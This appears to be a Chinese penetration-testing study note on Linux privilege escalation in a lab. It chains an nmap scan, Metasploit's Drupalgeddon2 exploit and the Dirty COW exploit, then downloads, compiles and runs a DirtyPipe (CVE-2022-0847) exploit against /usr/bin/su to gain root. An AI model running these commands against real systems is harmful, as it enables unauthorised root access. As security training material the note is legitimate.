免责声明:本文仅做技术交流与学习...
目录
Linux-内核漏洞Web用户提权-探针&利用-脏牛dcow
nmap扫描目标IP及端口
导入脚本,进行探针
通过MSF发现目标机器存在脏牛漏洞
---上传信息搜集的文件,查找漏洞,利用漏洞,继续上传EXP.
--密码改了,再用xshell连一下就行了.
Linux-内核漏洞本地用户提权-探针&利用-DirtyPipe(CVE-2022-0847)
前提:
探针:
利用EXP:
Linux-内核漏洞Web用户提权-探针&利用-脏牛dcow
nmap扫描目标IP及端口
nmap 192.168.46.0/24
nmap -p -65535 192.168.46.144
导入脚本,进行探针
(linux-exploit-suggester--->获取信息...)等等
通过MSF发现目标机器存在脏牛漏洞
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.46.144
set rport 1898
run
---上线
---上传信息搜集的文件,查找漏洞,利用漏洞,继续上传EXP.
upload /root/dcow.cpp/tmp/dcow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
--密码改了,再用xshell连一下就行了.
Linux-内核漏洞本地用户提权-探针&利用-DirtyPipe(CVE-2022-0847)
前提:
5.8<=Linux kernel<5.16.11/5.15.25/5.10.102
探针:
les.sh
traitor-amd64
beroot.py
--探针出来,找EXP.
利用EXP:
wget https://haxx.in/files/dirtypipez.c
gcc -o dirtypipez dirtypipez.c
./dirtypipez /usr/bin/su #任何具体suid权限的文件均可
id